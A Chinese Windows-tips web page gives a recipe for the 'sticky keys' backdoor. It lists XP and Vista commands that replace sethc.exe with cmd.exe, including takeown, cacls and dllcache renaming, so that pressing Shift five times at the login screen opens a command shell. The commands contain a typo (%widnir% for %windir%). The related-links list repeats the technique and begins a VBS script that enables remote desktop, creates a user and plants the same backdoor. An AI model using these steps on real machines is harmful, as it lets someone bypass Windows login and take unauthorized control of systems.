WINDOWS漏洞:粘置键
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/
XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe
VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件
在登录界面按5此SHIFT,出来cmd shell,然后……
相关推荐
-
WINDOWS漏洞:粘置键
在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开.这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了. 参考McafeeAvertLabs: http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/ XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dll
-
简析Windows Vista内置防火墙图文教程
早在Windows 2000系统的扩展工具包中就出现了ICF(Internet Connection Firewall)工具,通过它可以配置网络数据包的传入规则,但是在Windows 2000中这个ICF工具没有内置到系统中.因此说起Windows系统自带的防火墙要追溯到XP系统,在XP和XP SP1系统中内置了一个名为Internet Connection Firewall的组件,它提供了基本的包过滤功能,这就是系统防火墙的前身. 到了XP SP2发布后这个ICF就名正言顺地成为了Window
-
可自删除 开启3389创建用户粘滞键后门的vbs
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv"
-
Win2003服务器系统文件权限设置小结
不多说了,下面将说明需要设置权限的系统文件,设置为只有Administrators组可以访问,并且拒绝Guests组访问. "%SystemDrive%/boot.ini" Windows主要依赖Boot.ini文件来确定计算机在重启(引导)过程中显示的可供选取的操作系统类别 "%SystemDrive%/AUTOEXEC.BAT" 装有DOS或 Windows操作系统的计算机在启动的 时候,都要自动执行 AUTOEXEC.BAT 批处理文件 "%Syst
-
变态入侵之有史以来最酷的Windows后门sethc.exe
后门原理: 在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开.这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了. XP: 将安装源光盘弹出(或将硬盘上的安装目录改名) cd %widnir%\system32\dllcache ren sethc.exe *.ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe V
-
轻松设置拒绝windows 2003泄密
一直以来,Windows 2003系统是大家公认在安全方面做得比较好的操作系统,以致于很多人在使用了Windows 2003操作系统后就认为自己的系统安全已经"高枕无忧"了.可事实并非如此,细心的朋友可能会发现,Windows 2003系统在给人们带来强大稳定性的同时,其缺省设置同样也存在安全隐患!为此,我们有必要对Windows 2003缺省设置进行适当调整,以便让系统"拒绝"对外泄密. 大家知道,在默认状态下Windows 2003系统会将你输入的密码内容自做主
-
Windows XP终极设置之系统优化篇
一.系统优化设置. 1.删除Windows强加的附件: 1) 用记事本NOTEPAD修改winntinfsysoc.inf,用檎?替换功能,在查找框中输入,hide(一个英文逗号紧跟hide),将"替换为"框设为空.并选全部替换,这样,就把所有的,hide都去掉了, 2) 存盘退出, 3)再运行"添加-删除程序",就会看见"添加/删除 Windows 组件"中多出了好几个选项:这样你可以删除好些没有用的附件. 2.关掉调试器Dr. Watson:
-
WINDOWS XP终极设置(呕心沥血版)第1/2页
WINDOWS XP终极设置WINDOWS XP终极设置(呕心沥血版) 声明:以上资料均是从从互联网上搜集整理而来,本人未曾一一测试,所以在改动时要小心,做好备份,有备无患么,呵呵. 一.系统优化设置. 1.删除Windows强加的附件: 1) 用记事本NOTEPAD修改\winnt\inf\sysoc.inf,用查找/替换功能,在查找框中输入,hide(一个英文逗号紧跟hide),将"替换为"框设为空.并选全部替换,这样,就把所有的,hide都去掉了, 2) 存盘退出, 3)再运行
-
Windows快捷键大全
Windows快捷键大全 一.常用快捷键 F1 显示当前程序或者Windows的帮助内容. F2 当你选中一个文件的话,这意味着"重命名" F3 当你在桌面上的时候是打开"查找:所有文件" 对话框 F10或ALT激活当前程序的菜单栏 windows键或CTRL+ESC 打开开始菜单 CTRL+ALT+DELETE 在win9x中打开关闭程序对话框 DELETE 删除被选择的选择项目,如果是文件,将被放入回收站 SHIFT+DELETE删除被选择的选择项目,如果是文件
-
Windows api关于注册表的操作经验和总结
读取注册表常用的函数 RegOpenKeyEx 用于打开一个键 RegSetValueEx 用于设置一个键的键值 RegQueryValueEx 用于读取一个键的值 RegCloseKey 用于关闭RegOpen打开的键 RegQueryValueEx通常连用两次来读取键值,第一次只读取键的大小,然后分配内存,然后再用一次RegQueryValueEx来读取键值到buffer. 下面是一个读取windows下的path键值的例子 HKEY hk; int result = RegOpenKeyE
随机推荐
- MySQL 数据类型和建库策略
- Xshell5 注册码 ,Xftp5 注册码,Xmanager5注册码(已测)
- Oracle删除数据报ORA 02292错误的巧妙解决方法
- Codeigniter实现智能裁剪图片的方法
- 深入分析Java内存区域的使用详解
- 如何从数据库中随机取出10条记录的方法
- JavaScript中的对象的extensible属性介绍
- ajax处理服务器返回的三种数据类型方法
- js获取及修改网页背景色和字体色的方法
- SQL 无法装载DLL Microsoft原因(无法修改sa密码)
- Nginx服务器下使用rewrite重写url以实现伪静态的示例
- 浅说js变量
- Android自定义UI手势密码改进版
- java实现文件编码转换的方法
- Vue三层嵌套路由的示例代码
- .NET使用.NET Core CLI开发应用程序
- 详解在Spring中如何使用AspectJ来实现AOP
- jQuery开发仿QQ版音乐播放器
- iOS程序性能优化的技巧
- msxml3.dll 错误 800c0019 系统错误:-2146697191解决方法